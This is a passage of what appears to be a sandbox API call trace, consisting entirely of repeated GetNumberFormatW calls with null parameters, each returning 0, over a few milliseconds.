lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.193] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.194] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.195] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.196] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, 